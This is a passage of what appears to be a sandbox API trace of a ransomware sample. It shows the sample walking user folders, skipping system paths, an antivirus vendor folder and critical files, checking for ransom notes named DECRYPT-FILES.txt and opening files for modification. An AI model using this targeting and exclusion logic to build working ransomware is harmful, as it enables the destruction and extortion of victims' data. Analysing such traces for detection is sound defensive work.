HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.JG6Rv" [0180.630] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.JG6Rv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.jg6rv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.631] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=390920) returned 1 [0180.631] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.631] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x24e0000 [0180.632] UnmapViewOfFile (lpBaseAddress=0x24e0000) returned 1 [0180.632] CloseHandle (hObject=0x288) returned 1 [0180.632] CloseHandle (hObject=0x284) returned 1 [0180.632] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.632] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e064c0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x8e064c0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0xaab56820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5f708, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.MPT.JG6Rv", cAlternateFileName="GLOBAL~1.JG6")) returned 0 [0180.632] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.632] CloseHandle (hObject=0x27c) returned 1 [0180.632] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.633] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.633] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.633] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.633] CloseHandle (hObject=0x274) returned 1 [0180.633] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.633] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.633] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.633] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.633] CloseHandle (hObject=0x26c) returned 1 [0180.633] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0180.633] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0180.633] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0180.633] lstrcatW (in: lpString1="Network", lpString2="\\" | out: lpString1="Network\\") returned="Network\\" [0180.633] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Network\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Program Files") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch=":\\Windows") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Games\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\All Users") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="AhnLab") returned 0x0 [0180.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0180.634] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.634] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\0a16c9.tmp") returned 75 [0180.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0180.634] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.634] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\DECRYPT-FILES.txt") returned 82 [0180.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0180.634] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*" [0180.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.634] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.635] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeca3d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.635] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.635] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.635] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.635] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.635] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.635] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.635] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0180.635] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.635] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" [0180.635] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\0a16c9.tmp" [0180.635] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.635] CloseHandle (hObject=0x0) returned 0 [0180.635] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.636] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0180.636] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0180.636] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0180.636] lstrcatW (in: lpString1="Connections", lpString2="\\" | out: lpString1="Connections\\") returned="Connections\\" [0180.636] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="Connections\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Program Files") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch=":\\Windows") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Games\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\All Users") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="AhnLab") returned 0x0 [0180.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.636] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0180.636] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.636] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\0a16c9.tmp") returned 87 [0180.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.637] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0180.637] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.637] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\DECRYPT-FILES.txt") returned 94 [0180.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.637] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0180.637] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0180.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.638] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.638] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.638] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.638] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.638] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeca3d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.638] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.638] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.638] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.638] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.638] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.638] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.638] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned 76 [0180.638] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.638] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0180.638] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\0a16c9.tmp" [0180.638] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.639] CloseHandle (hObject=0x0) returned 0 [0180.639] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.639] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.639] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.639] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, 